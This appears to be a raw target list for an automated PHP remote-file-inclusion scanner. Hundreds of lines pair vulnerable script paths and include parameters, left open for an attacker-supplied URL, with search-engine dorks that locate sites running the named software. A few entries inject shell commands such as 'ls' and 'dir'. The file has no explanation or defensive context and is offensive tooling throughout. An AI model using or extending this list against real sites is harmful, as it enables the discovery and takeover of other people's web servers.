.php?debut="&#13;
.php?default="&#13;
.php?destino="&#13;
.php?dir="&#13;
.php?display="&#13;
.php?file_id="&#13;
.php?file="&#13;
.php?filepath="&#13;
.php?flash="&#13;
.php?folder="&#13;
.php?for="&#13;
.php?form="&#13;
.php?formatword="&#13;
.php?funcao="&#13;
.php?function="&#13;
.php?g="&#13;
.php?get="&#13;
.php?go="&#13;
.php?gorumDir="&#13;
.php?goto="&#13;
.php?h="&#13;
.php?headline="&#13;
.php?i="&#13;
.php?inc="&#13;
.php?include="&#13;
.php?includedir="&#13;
.php?inter="&#13;
.php?itemid="&#13;
.php?j="&#13;
.php?join="&#13;
.php?jojo="&#13;
.php?l="&#13;
.php?lan="&#13;
.php?lang="&#13;
.php?link="&#13;
.php?load="&#13;
.php?loc="&#13;
.php?m="&#13;
.php?main="&#13;
.php?meio.php="&#13;
.php?meio="&#13;
.php?menu="&#13;
.php?menuID="&#13;
.php?mep="&#13;
.php?month="&#13;
.php?mostra="&#13;
.php?n="&#13;
.php?name="&#13;
.php?nav="&#13;
.php?new="&#13;
.php?news="&#13;
.php?next="&#13;
.php?nextpage="&#13;
.php?o="&#13;
.php?op="&#13;
.php?open="&#13;
.php?option="&#13;
.php?origem="&#13;
.php?Page_ID="&#13;
.php?pageurl="&#13;
.php?para="&#13;
.php?part="&#13;
.php?pg="&#13;
.php?pid="&#13;
.php?place="&#13;
.php?play="&#13;
.php?plugin="&#13;
.php?pm_path="&#13;
.php?pollname="&#13;
.php?post="&#13;
.php?pr="&#13;
.php?prefix="&#13;
.php?prefixo="&#13;
.php?q="&#13;
.php?redirect="&#13;
.php?ref="&#13;
.php?refid="&#13;
.php?regionId="&#13;
.php?release_id="&#13;
.php?release="&#13;
.php?return="&#13;
.php?root="&#13;
.php?S="&#13;
.php?searchcode_id="&#13;
.php?sec="&#13;
.php?secao="&#13;
.php?sect="&#13;
.php?sel="&#13;
.php?server="&#13;
.php?servico="&#13;
.php?sg="&#13;
.php?shard="&#13;
.php?show="&#13;
.php?sid="&#13;
.php?site="&#13;
.php?sourcedir="&#13;
.php?start="&#13;
.php?storyid="&#13;
.php?str="&#13;
.php?subject="&#13;
.php?sufixo="&#13;
.php?systempath="&#13;
.php?t="&#13;
.php?task="&#13;
.php?teste="&#13;
.php?theme_dir="&#13;
.php?thread_id="&#13;
.php?tid="&#13;
.php?title="&#13;
.php?to="&#13;
.php?topic_id="&#13;
.php?type="&#13;
.php?u="&#13;
.php?url="&#13;
.php?urlFrom="&#13;
.php?v="&#13;
.php?var="&#13;
.php?vi="&#13;
.php?view="&#13;
.php?visual="&#13;
.php?wPage="&#13;
.php?y="&#13;
/components/com_forum/download.php?phpbb_root_path= com_forum&#13;
[Script Path]/admin/index.php?o= admin/index.php"&#13;
/admin/index.php?o= admin/index.php"&#13;
index.php?menu=deti&amp;page= index.php?menu=deti&amp;page"&#13;
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter&#13;
/classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"&#13;
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&#13;
index.php?RP_PATH= reviewpost&#13;
index.php?pagename= phpquiz&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/&#13;
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar&#13;
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"&#13;
/tools/send_reminders.php?includedir= day.php?date=&#13;
SQuery/lib/gore.php?libpath= "/SQuery/"&#13;
m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?&#13;
wamp_dir/setup/yesno.phtml?no_url= "setup"&#13;
components/com_forum/download.php?phpbb_root_path= "com_forum"&#13;
index.php?p= "/index.php?p=*.php"&#13;
index.php?pag= "/index.php?pag=*.php"&#13;
template.php?page= "/template.php?page=*.php"&#13;
main.php?page= "/main.php?page=*.php"&#13;
index2.php?pag= "/index2.php?pag=*.php"&#13;
home.php?pag= "/home.php?pag=*.php"&#13;
index.php?page= "/index.php?page=*.php"&#13;
default.php?page= "/default.php?page=*.php"&#13;
inc/cmses/aedatingCMS.php?dir[inc]= "flashchat"&#13;
/modules/vwar/admin/admin.php?vwar_root= vwar&#13;
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum&#13;
encapscms_PATH/core/core.php?root= encapscms_PATH&#13;
inc/session.php?sessionerror=0&amp;lang= inc&#13;
path/index.php?function=custom&amp;custom= path&#13;
[MyAlbum_DIR]/language.inc.php?langs_dir= [MyAlbum_DIR]&#13;
/inc/irayofuncs.php?irayodirhack= "/inc/"&#13;
index.php?function=custom&amp;custom= custom&#13;
cyberfolio/portfolio/msg/view.php?av= cyberfolio&#13;
/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT= CFG_PHPGIGGLE_ROOT&#13;
*mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=&#13;
*pivot/modules/module_db.php?pivot_path=&#13;
*inc/header.php/step_one.php?server_inc=&#13;
*inst/index.php?lng=../../include/main.inc&amp;G_PATH=&#13;
*inc/pipe.php?HCL_path=&#13;
*include/new-visitor.inc.php?lvc_include_dir=&#13;
*includes/header.php?systempath=&#13;
*support/mailling/maillist/inc/initdb.php?absolute_path=&#13;
*coppercop/theme.php?THEME_DIR=&#13;
*zentrack/index.php?configFile=&#13;
*include/write.php?dir=&#13;
include/new-visitor.inc.php?lvc_include_dir=&#13;
includes/header.php?systempath=&#13;
support/mailling/maillist/inc/initdb.php?absolute_path=&#13;
coppercop/theme.php?THEME_DIR=&#13;
becommunity/community/index.php?pageurl=&#13;
shoutbox/expanded.php?conf=&#13;
agendax/addevent.inc.php?agendax_path=&#13;
myPHPCalendar/admin.php?cal_dir=&#13;
yabbse/Sources/Packages.php?sourcedir=&#13;
zboard/zboard.php&#13;
path_of_cpcommerce/_functions.php?prefix&#13;
dotproject/modules/tasks/viewgantt.php?root_dir=&#13;
My_eGery/public/displayCategory.php?basepath=&#13;
modules/My_eGery/public/displayCategory.php?basepath=&#13;
modules/4nAlbum/public/displayCategory.php?basepath=&#13;
modules/coppermine/themes/default/theme.php?THEME_DIR=&#13;
modules/agendax/addevent.inc.php?agendax_path=&#13;
modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=&#13;
modules/xgery/upgrade_album.php?GERY_BASEDIR=&#13;
modules/coppermine/include/init.inc.php?CPG_M_DIR=&#13;
modules/mod_mainmenu.php?mosConfig_absolute_path=&#13;
pivot/modules/module_db.php?pivot_path=&#13;
library/editor/editor.php?root=&#13;
library/lib.php?root=&#13;
e107/e107_handlers/secure_img_render.php?p=&#13;
main.php?x=&#13;
main.php?page=&#13;
*default.php?page=&#13;
*default.php?body=&#13;
default.php?page=&#13;
*index.php?url=&#13;
*index.php?arquivo=&#13;
index.php?meio.php=&#13;
index.php?include=&#13;
index.php?open=&#13;
index.php?visualizar=&#13;
index.php?pagina=&#13;
index.php?inc=&#13;
index.php?page=&#13;
index.php?pag=&#13;
index.php?p=&#13;
index.php?content=&#13;
index.php?cont=&#13;
index.php?c=&#13;
index.php?meio=&#13;
index.php?x=&#13;
index.php?cat=&#13;
index.php?site=&#13;
index.php?configFile=&#13;
index.php?action=&#13;
index.php?do=&#13;
index2.php?x=&#13;
Index.php?id=&#13;
index2.php?content=&#13;
template.php?pagina&#13;
inc/step_one_tables.php?server_inc=&#13;
phpshop/index.php?base_dir=&#13;
admin.php?cal_dir=&#13;
path_of_cpcommerce/_functions.php?prefix=&#13;
contacts.php?cal_dir=&#13;
convert-date.php?cal_dir=&#13;
album_portal.php?phpbb_root_path=&#13;
mainfile.php?MAIN_PATH=&#13;
dotproject/modules/files/index_table.php?root_dir=&#13;
html/affich.php?base=&#13;
gery/init.php?HTTP_POST_VARS=&#13;
pm/lib.inc.php?pm_path=&#13;
ideabox/include.php?gorumDir=&#13;
modules/tasks/viewgantt.php?root_dir=&#13;
cgi-bin/index.cgi?page=&#13;
cgi-bin/awstats.pl?update=1&amp;logfile=&#13;
cgi-bin/awstats/awstats.pl?configdir&#13;
cgi-bin/ikonboard.cgi&#13;
cgi-bin/acart/acart.pl?&amp;page=&#13;
cgi-bin/quikstore.cgi?category=&#13;
cgi-bin/ubb/ubb.cgi?g=&#13;
cgi-bin/hinsts.pl?&#13;
cgi-bin/bp/bp-lib.pl?g=&#13;
ccbill/whereami.cgi?g=ls&#13;
cgi-bin/telnet.cgi&#13;
cgi-bin/1/cmd.cgi&#13;
encore/forumcgi/display.cgi?preftemp=temp&amp;page=anonymous&amp;file=&#13;
cgi-sys/guestbook.cgi?user=cpanel&amp;template=&#13;
account.php?action= account.php?action=&#13;
account.php?action= iurl:"account.php?action="&#13;
account.php?action= iurl:".php?action="&#13;
account.php?action= .php?action=&#13;
accounts.php?command= .php?command="&#13;
addmedia.php?factsfile[$LANGUAGE]= phpGedView&#13;
.php?p="&#13;
announcements.php?phpraid_dir= "phpraid"&#13;
announcements.php?phpraid_dir= "phpraid signup"&#13;
announcements.php?phpraid_dir= php raid&#13;
announcements.php?phpraid_dir= phpraid&#13;
announcements.php?phpraid_dir= phpraid signup&#13;
arg.php?arg= .php?arg=&#13;
args.php?arg= .php?arg=&#13;
atom.php5?page= .php5?id=&#13;
auto.php?inc= .php?inc="&#13;
auto.php?page= auto.php?page=&#13;
base.php?f1= base.php?f1="&#13;
base.php?f1= .php?f1="&#13;
board.php?see= board.php?see="&#13;
board.php?see= .php?see="&#13;
book.php5?page= php5?page=&#13;
/calendar.php?l= calendar.php?l="&#13;
/calendar.php?l= calendar.php?l=&#13;
/calendar.php?p= calendar.php?p="&#13;
/calendar.php?p= calendar.php?p=&#13;
/calendar.php?pg= calendar.php?pg="&#13;
/calendar.php?pg= calendar.php?pg=&#13;
/calendar.php?s= calendar.php?s="&#13;
/calendar.php?s= calendar.php?s=&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= /ubbthreads/"&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= /ubbthreads/&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= "/ubbthreads/"&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= "ubbthreads"&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= ubbthreads&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository"&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_remository&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "Mambo"&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Mambo&#13;
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= com_serverstat&#13;
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= "com_serverstat"&#13;
canal.php?meio= .php?meio="&#13;
/classes/adodbt/sql.php?classes_dir= "adobt"&#13;
/classes/adodbt/sql.php?classes_dir= adobt&#13;
/classes/adodbt/sql.php?classes_dir= adobt&#13;
/classified_right.php?language_dir= "classified.php"&#13;
/classified_right.php?language_dir= classified.php&#13;
/classified_right.php?language_dir= classified.php phpbazar&#13;
/classified_right.php?language_dir= "phpbazar"&#13;
/classified_right.php?language_dir= phpbazar&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN"&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN 1.2.3"&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN 1.2.3&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= powered by phpCOIN 1.2.3&#13;
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&#13;
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= "com_extended_registration"&#13;
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&#13;
/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms"&#13;
/components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms"&#13;
/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms&#13;
components/com_performs/performs.php?mosConfig_absolute_path= com_performs&#13;
components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"&#13;
/components/com_zoom/includes/database.php?mosConfig_absolute_path= "com_zoom"&#13;
/components/com_zoom/includes/database.php?mosConfig_absolute_path= com_zoom&#13;
/components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"&#13;
content.php?page= "content.php?page=*.php"&#13;
/embed/day.php?path= "Calendar"&#13;
/embed/day.php?path= Calendar&#13;
/embed/day.php?path= intitle:"Login to Calendar"&#13;
/embed/day.php?path= "Login to Calendar"&#13;
/embed/day.php?path= Login to Calendar&#13;
/embed/day.php?path= "WebCalendar"&#13;
/embed/day.php?path= WebCalendar&#13;
enc/content.php?Home_Path= "doodle"&#13;
enc/content.php?Home_Path= doodle&#13;
enc/content.php?Home_Path= "doodle cart"&#13;
enc/content.php?Home_Path= doodle cart&#13;
enc/content.php?Home_Path= "powered by doodle cart"&#13;
enc/content.php?Home_Path= powered by doodle cart&#13;
/header.php?abspath= "MobilePublisherPHP"&#13;
/header.php?abspath= MobilePublisherPHP&#13;
impex/ImpExData.php?systempath= intext:powered by vbulletin&#13;
impex/ImpExData.php?systempath= powered by vbulletin&#13;
impex/ImpExData.php?systempath= "vbulletin"&#13;
impex/ImpExData.php?systempath= vbulletin&#13;
/includes/dbal.php?eqdkp_root_path= "EQdkp"&#13;
/includes/dbal.php?eqdkp_root_path= EQdkp&#13;
/includes/dbal.php?eqdkp_root_path= "powered by EQdkp"&#13;
/includes/dbal.php?eqdkp_root_path= powered by EQdkp&#13;
/includes/kb_constants.php?module_root_path= "Base"&#13;
/includes/kb_constants.php?module_root_path= Base&#13;
/includes/kb_constants.php?module_root_path= "Knowledge"&#13;
/includes/kb_constants.php?module_root_path= Knowledge&#13;
/includes/kb_constants.php?module_root_path= "Knowledge Base"&#13;
/includes/kb_constants.php?module_root_path= Knowledge Base&#13;
/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"&#13;
/includes/kb_constants.php?module_root_path= Powered by Knowledge Base&#13;
index1.php?= "index1.php?="&#13;
index1.php?= index1.php?=&#13;
index1.php?= "index1.php?=*.php?&#13;
index2.php?= "index2.php?="&#13;
index2.php?= index2.php?=&#13;
index2.php?= "index2.php?=*.php?"&#13;
index.php?body= index.php?body=&#13;
index.php?body= "index.php?body="&#13;
index.php?go1= index.php?go1=&#13;
index.php?go1= "index.php?go1="&#13;
index.php?go= "index.php?go="&#13;
index.php?go= index.php?go=&#13;
index.php?pageurl= "index.php?pageurl="&#13;
index.php?pageurl= "index.php?pageurl=*.php"&#13;
index.php?pageurl= index.php?pageurl=*.php&#13;
index.php?pageurl= "index.php?pageurl=*.php&#13;
index.php?pagina1= "index.php?pagina1="&#13;
index.php?pagina1= index.php?pagina1=&#13;
index.php?pagina= "index.php?pagina="&#13;
index.php?pagina= "index.php?pagina=*.php"&#13;
index.php?site1= index.php?site1=&#13;
index.php?site1= "index.php?site1="&#13;
index.php?site= "index.php?site="&#13;
index.php?site= index.php?site=&#13;
index.php?var1= "index.php?var1="&#13;
index.php?var1= index.php?var1=&#13;
index.php?var2= index.php?var2=&#13;
index.php?var= index.php?va21=&#13;
index.php?var= index.php?var=&#13;
index.php?var= "index.php?var1="&#13;
index.php?var= index.php?var1=&#13;
index.php?var= "index.php?var2="&#13;
index.php?var= index.php?var2=&#13;
index.php?var= "index.php?var=*.php"&#13;
index.php?var= index.php?var=*.php&#13;
/login.php?dir= login.php?dir=&#13;
/login.php?dir= "login.php?dir="&#13;
/login.php?dir= login.php?dir=&#13;
main.php?id= "main.php?id=*.php"&#13;
/main.php?sayfa= "main.php?sayfa="&#13;
/main.php?sayfa= main.php?sayfa=&#13;
/mcf.php?content= mcf.php"&#13;
mcf.php?content= mcf.php"&#13;
mcf.php?content= "mcf.php"&#13;
mcf.php?content= mcf.php&#13;
/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar&#13;
/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar&#13;
/modules/TotalCalendar/about.php?inc_dir= "TotalCalendar"&#13;
/modules/TotalCalendar/about.php?inc_dir= TotalCalendar&#13;
/modules/vwar/admin/admin.php?vwar_root= "vwar"&#13;
/modules/vwar/admin/admin.php?vwar_root= vwar&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "index.php?id="&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= index.php?id=&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= phpwcms/index.php?id=&#13;
skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer"&#13;
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer&#13;
skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"&#13;
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS&#13;
skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "CMS"&#13;
skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"&#13;
/skin/zero_vote/error.php?dir= "skin/zero_vote/error.php"&#13;
/skin/zero_vote/error.php?dir= skin/zero_vote/error.php&#13;
/sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"&#13;
/sources/functions.php?CONFIG[main_path]= "Powered By ScozNews"&#13;
/sources/functions.php?CONFIG[main_path]= (Powered By ScozNews)&#13;
/sources/functions.php?CONFIG[main_path]= Powered By ScozNews&#13;
/sources/functions.php?CONFIG[main_path]= "ScozNews"&#13;
/sources/functions.php?CONFIG[main_path]= ScozNews&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= "Aardvark"&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= Aardvark&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= "Aardvark TopSites"&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= Aardvark TopSites&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= Powered By Aardvark Topsites PHP 4.2.2&#13;
/sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"&#13;
/sources/template.php?CONFIG[main_path]= (Powered By ScozNews)&#13;
/sources/template.php?CONFIG[main_path]= Powered By ScozNews&#13;
/sources/template.php?CONFIG[main_path]= "ScozNews"&#13;
/sources/template.php?CONFIG[main_path]= ScozNews&#13;
/surveys/survey.inc.php?path= surveys&#13;
/surveys/survey.inc.php?path= "surveys"&#13;
/tags.php?BBCodeFile= intitle:"Tagger LE"&#13;
/tags.php?BBCodeFile= intitle:"Tagger LE" tags.php&#13;
/tags.php?BBCodeFile= "Tagger LE"&#13;
/tags.php?BBCodeFile= Tagger LE&#13;
/tags.php?BBCodeFile= "tags.php"&#13;
/tags.php?BBCodeFile= tags.php&#13;
/templates/headline_temp.php?nst_inc= intitle:fusion:news:management&#13;
/templates/headline_temp.php?nst_inc= ‘fusion"&#13;
/templates/headline_temp.php?nst_inc= "fusion"&#13;
/templates/headline_temp.php?nst_inc= fusion&#13;
/templates/headline_temp.php?nst_inc= fusion:news:management:system&#13;
/templates/headline_temp.php?nst_inc= "management"&#13;
/templates/headline_temp.php?nst_inc= management&#13;
/templates/headline_temp.php?nst_inc= "news"&#13;
/templates/headline_temp.php?nst_inc= news&#13;
/templates/headline_temp.php?nst_inc= "system"&#13;
/templates/headline_temp.php?nst_inc= system&#13;
/tools/send_reminders.php?includedir= "day.php?date="&#13;
/tools/send_reminders.php?includedir= day.php?date=&#13;
/ws/get_events.php?includedir= /WebCalendar/&#13;
/ws/get_events.php?includedir= "/WebCalendar/"&#13;
/ws/get_events.php?includedir= "WebCalendar"&#13;
/zipndownload.php?PP_PATH= "PhotoPost"&#13;
/zipndownload.php?PP_PATH= PhotoPost&#13;
/zipndownload.php?PP_PATH= "PhotoPostP"&#13;
/zipndownload.php?PP_PATH= "PhotoPost PHP"&#13;
/zipndownload.php?PP_PATH= "PhotoPost PHP 4.6"&#13;
/zipndownload.php?PP_PATH= PhotoPost PHP 4.6&#13;
/zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6?&#13;
/zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6&#13;
cmd.php?arg= .php?arg=&#13;
/codebb/lang_select?phpbb_root_path= codebb&#13;
/codebb/lang_select?phpbb_root_path= codebb 1.1b3&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rs gery&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery.php&#13;
content.php?inc= .php?inc="&#13;
content.php?seite= content.php?seite=&#13;
content.php?seite= .php?seite=&#13;
dbase.php?action= dbase.php&#13;
dbase.php?action= dbase.php?action=&#13;
dbase.php?action= .php?action=&#13;
default.php?arquivo= .php?arquivo=&#13;
default.php?vis= .php?vis="&#13;
define.php?term= .php?term="&#13;
detail.php?prod= detail.php?prod="&#13;
detail.php?prod= .php?prod="&#13;
details.php?loc= details.php?loc=&#13;
details.php?loc= .php?loc=&#13;
directions.php?loc= directions.php?loc=&#13;
direct.php?loc= direct.php?loc=&#13;
display.php?f= display.php?f=&#13;
display.php?file= display.php?file=&#13;
display.php?lang= display.php?lang=&#13;
display.php?l= display.php?l=&#13;
display.php?ln= display.php?ln=&#13;
display.php?pag= display.php?pag=&#13;
display.php?page= display.php?page="&#13;
display.php?page= .php?page="&#13;
display.php?page=&amp;lang= display.php?page="&#13;
display.php?page=&amp;lang= .php?page="&#13;
display.php?p= display.php?p=&#13;
display.php?pg= display.php?pg=&#13;
display.php?s= display.php?s=&#13;
display.php?table= display.php?table=&#13;
display.php?table= .php?table=&#13;
download.php?sub= "download.php?sub="&#13;
download.php?sub= download.php?sub=&#13;
eng.php?img= eng.php?img=&#13;
eng.php?img= .php?img=&#13;
/exibir.php?arquivo= .php?arquivo=&#13;
experts.php?sub= "experts.php?sub="&#13;
experts.php?sub= experts.php?sub=&#13;
forum.php?seite= .php?seite=&#13;
frag.php?exec= frag.php"&#13;
frag.php?exec= frag.php?exec="&#13;
frag.php?exec= .php?exec="&#13;
frame.php?loc= .php?loc="&#13;
galerie.php?do= .php?do="&#13;
glossary.php?term= .php?term="&#13;
handlinger.php?vis= .php?vis="&#13;
/help_text_vars.php?cmd=dir&amp;PGV_BASE_DIRECTORY= PHP Ged View&#13;
/help_text_vars.php?cmd=dir&amp;PGV_BASE_DIRECTORY= PHP GedView&#13;
/help_text_vars.php?cmd=dir&amp;PGV_BASE_DIRECTORY= PHPGedView&#13;
/help_text_vars.php?cmd=dir&amp;PGV_BASE_DIRECTORY= PHPGedView &lt;= 3.3.7&#13;
home1.php?ln= .php?ln=&#13;
home2.php?ln= .php?ln=&#13;
home.php?a= home.php?a="&#13;
home.php?a= .php?a="&#13;
home.php?act= "home.php?act="&#13;
home.php?act= home.php?act=&#13;
home.php?arg= .php?arg=&#13;
home.php?func= .php?func="&#13;
home.php?i= "home.php?i="&#13;
home.php?i= home.php?i=&#13;
home.php?inc= "home.php?inc="&#13;
home.php?inc= home.php?inc=&#13;
home.php?ln= .php?ln=&#13;
home.php?ltr= .php?ltr="&#13;
home.php?sit= .php?sit="&#13;
home.php?table= .php?table=&#13;
image.php?img= image.php?img=&#13;
image.php?img= .php?img=&#13;
img.php?loc= img.php?loc="&#13;
img.php?loc= .php?loc="&#13;
inc.php?inc= .php?inc="&#13;
index1.php?arg= .php?arg=&#13;
index1.php?arq= .php?arq=&#13;
index1.php?func= .php?func="&#13;
index1.php?inc= .php?inc="&#13;
index1.php?lk= .php?lk="&#13;
/index1.php?ln= .php?ln=&#13;
index1.php?ltr= .php?ltr="&#13;
index1.php?mid= index1.php?mid=&#13;
index1.php?page= index1.php?page="&#13;
index1.php?p= .php?p="&#13;
index1.php?p= .php?pag="&#13;
index1.php?p= .php?page="&#13;
index1.php?p= .php?pg="&#13;
index1.php?s= index1.php?s="&#13;
index1.php?show= index1.php?show="&#13;
index1.php?show= .php?show="&#13;
index1.php?table= .php?table=&#13;
index2.php?arg= .php?arg=&#13;
index2.php?arq= .php?arq=&#13;
index2.php?c= index2.php?c="&#13;
index2.php?c= .php?c="&#13;
index2.php?cont= index2.php?cont="&#13;
index2.php?cont= .php?cont="&#13;
index2.php?content= index2.php?cont="&#13;
index2.php?content= index2.php?content="&#13;
index2.php?content= .php?content="&#13;
index2.php?content= index2.php?content=&#13;
index2.php?content= .php?content=&#13;
index2.php?i= /index2.php?i=&#13;
index2.php?inc= .php?inc="&#13;
index2.php?l= .php?l="&#13;
index2.php?lg= index.php?lg="&#13;
index2.php?lk= .php?lk="&#13;
index2.php?ln= index.php?ln="&#13;
index2.php?ln= .php?ln="&#13;
index2.php?lng= index.php?lng="&#13;
index2.php?loca= index2.php?loca=&#13;
index2.php?loca= .php?loca=&#13;
index2.php?meio= .php?meio=&#13;
index2.php?s= index2.php?s="&#13;
index2.php?s= .php?s="&#13;
index2.php?table= .php?table=&#13;
index2.php?x= index2.php?x=&#13;
index2.php?x= .php?x=&#13;
index.php3?act= index.php3?act=&#13;
index.php3?act= .php3?act=&#13;
index.php3?act= .php3?act="&#13;
index.php3?file= .php3?f="&#13;
index.php3?file= .php3?file="&#13;
index.php3?id= index.php3?id=&#13;
index.php3?i= index.php3?i=&#13;
index.php3?lang= index.php3?lang=&#13;
index.php3?l= index.php3?l=&#13;
index.php3?page= index.php3?page=&#13;
index.php3?pag= index.php3?pag=&#13;
index.php3?p= index.php3?p="&#13;
index.php3?p= index.php3?pag="&#13;
index.php3?p= index.php3?page="&#13;
index.php3?p= index.php3?pg="&#13;
index.php3?pg= index.php3?pg=&#13;
index.php3?p= index.php3?p=&#13;
index.php3?s= index.php3?s="&#13;
index.php3?s= index.php3?s=&#13;
index.php3?s= .php3?s=&#13;
index.php3?s= .php3?s="&#13;
index.php4?lang= index.php4?lang="&#13;
index.php4?lang= index.php4?lang="&#13;
index.php4?lang= .php4?lang=&#13;
index.php4?lang= .php4?lang="&#13;
index.php4?lang= .php4?lang=&#13;
index.php5?lang= index.php5?lang="&#13;
index.php5?lang= index.php5?lang=&#13;
index.php5?lang= .php5?lang="&#13;
index.php?a= index.php?a="&#13;
index.php?a= .php?a="&#13;
index.php?acao= index.php?acao=&#13;
index.php?acao= .php?acao=&#13;
index.php?act= "index.php?act="&#13;
index.php?act= index.php?act=&#13;
index.php?action= index.php?action="&#13;
index.php?action= .php?action="&#13;
index.php?arg= index.php?arg=&#13;
index.php?arg= .php?arg=&#13;
index.php?arq= index.php?arq=&#13;
index.php?arq= .php?arq=&#13;
index.php?arquivo= .php?arquivo=&#13;
index.php?ba= index.php?ba="&#13;
index.php?b= index.php?b="&#13;
index.php?bas= index.php?bas="&#13;
index.php?bas= .php?bas="&#13;
index.php?cal= index.php?cal=&#13;
index.php?cal= "index.php?cal="&#13;
index.php?cal= ".php?cal="&#13;
index.php?c= index.php?c="&#13;
index.php?cal= .php?cal=&#13;
index.php?c= index.php?c=&#13;
index.php?c= "index.php?c="&#13;
index.php?c= ".php?c="&#13;
/index.php?cms= /index.php?cms=&#13;
/index.php?cms= /index.php?cms="&#13;
index.php?command= index.php?command="&#13;
index.php?command= .php?command="&#13;
index.php?content= index.php?content=&#13;
index.php?content= .php?content=&#13;
index.php?c= .php?c=&#13;
index.php?d1= .php?d1="&#13;
index.php?def= index.php?def="&#13;
index.php?def= .php?def="&#13;
index.php?def= index.php?def=&#13;
/index.php?dn= /index.php?dn=&#13;
/index.php?dn= index.php?dn="&#13;
/index.php?dn= .php?dn=&#13;
/index.php?dn= .php?dn="&#13;
index.php?dok= index.php?dok="&#13;
index.php?dok= .php?dok="&#13;
index.php?e= index.php?e="&#13;
index.php?exec= index.php?exec=&#13;
index.php?exec= .php?exec=&#13;
index.php?f1= .php?f1="&#13;
index.php?f= index.php?f="&#13;
index.php?fase= index.php?fase="&#13;
index.php?fase= .php?fase="&#13;
index.php?file= index.php?file="&#13;
index.php?fn= index.php?fn="&#13;
index.php?fn= .php?fn="&#13;
index.php?fPage= index.php?fPage="&#13;
index.php?fPage= index.php?fPage=&#13;
index.php?fPage= .php?fPage=&#13;
index.php?fPage= .php?fPage="&#13;
index.php?fPage= index.php?fPage=&#13;
index.php?fset= .php?fset="&#13;
index.php?func= .php?func="&#13;
index.php?goto= index.php?goto="&#13;
index.php?goto= .php?goto="&#13;
index.php?id=1&amp;lang= index.php?i=&#13;
index.php?id=1&amp;lang= "index.php?id="&#13;
index.php?id=1&amp;lang= index.php?id=&#13;
index.php?id=1&amp;lang= ".php?id="&#13;
index.php?id= index.php?id="&#13;
/index.php?id=&amp;lang= index.php?id="&#13;
